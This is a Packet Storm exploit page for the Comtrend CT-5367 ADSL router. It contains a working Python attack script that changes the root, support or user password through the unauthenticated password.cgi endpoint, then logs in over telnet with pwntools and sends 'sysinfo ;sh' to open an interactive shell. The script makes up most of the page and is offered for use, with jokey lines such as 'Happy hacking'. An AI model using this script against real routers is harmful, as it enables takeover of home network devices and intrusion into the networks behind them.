what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

COMTREND ADSL Router CT-5367 Remote Code Execution

COMTREND ADSL Router CT-5367 Remote Code Execution
Posted Dec 26, 2017
Authored by TnMch

COMTREND ADSL Router CT-5367 suffers from a remote code execution vulnerability. This vulnerability was originally discovered in March, 2011 by Todor Donev.

tags | exploit, remote, code execution
SHA-256 | f946364fbbb4e11c76d87c1d3b3dfc0173a9d86e0745d98cfcf5995885f541bc

COMTREND ADSL Router CT-5367 Remote Code Execution

Change Mirror Download
# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute
# Date: 11-12-2017
# Exploit Author: TnMch
# Software Link : null
# Type : HardWare
# Risk of use : High
# Type to use : Remote


1. Description

Any user can edit all users password and execute remote code directly without have access

2. Proof of Concept

request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi

<form>
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120">Username:</td>
<td><select name='userName' size="1">
<option value="0">
<option value="1">root <!-- admin -->
<option value="2">support <!-- support -->
<option value="3">user <!-- user -->
</select></td>
</tr>
<tr>
<td>Old Password:</td>
<td><input name='pwdOld' type="password" size="20" maxlength="16"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input name='pwdNew' type="password" size="20" maxlength="16"></td>
</tr>
<tr>
<td>Confirm Password:</td>
<td><input name='pwdCfm' type='password' size="20" maxlength="16"></td>
</tr>
</table>
<br>
<center><input type='button' onClick='btnApply()' value='Save/Apply'></center>
</form>


3 .exploit


#!/usr/bin/env python
import platform
import requests
import base64

url = "http://192.168.1.1/"

''' first check default gateway '''

r = requests.get(url,allow_redirects=True)
resp = r.content

'''Check resp'''

if 'Authorization' not in resp:
exit("[-]Invalid host !! ")

''' Change password '''

again = True

while again:
print "Which User"
print "(root | support | user )"
user = raw_input('user : ').split()[0]

if user not in ("root","support","user"):
exit("[-] No user with this name !! ")

print "[+] Update password ",user
password = raw_input('new password : ').split()[0]
print "[+] Update new password ['",password,"']"

if user == "root":
url +="password.cgi?sysPassword="+password
if user == "support":
url +="password.cgi?sptPassword="+password
if user == "user":
url +="password.cgi?usrPassword="+password

pass_b64 = password.encode('base64').split()[0]

r2 = requests.get(url,allow_redirects=True)
resp2 = r2.content

''' Check update '''

if pass_b64 in resp2:
print "[+] Password for user : ",user," updated!"
print "Happy hacking :D, enjoy"
else:
print "[-] Something Wrong , please check again! "

y_n = raw_input('Do you want again? :D (y/n) : ').split()[0]

if 'n'!= y_n and 'y' != y_n:
exit('bad input :(')
if y_n == 'n':
print "Go Go Go :D ,No Time for you Mr.Robot"
shell_yn= raw_input("Do you want shell? (y/n) :D : ").split()[0]
if shell_yn !='n':
sys = platform.system()
if sys =="Windows":
exit("Sorry only on Linux or Mac Os")
from pwn import *
target = "192.168.1.1"
port = 23
p = remote(target,port)
p.recvuntil("Login:")
p.sendline(user)
p.recvuntil("Password:")
p.sendline(password)
p.sendline("sysinfo ;sh")
p.interactive()
again = False

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close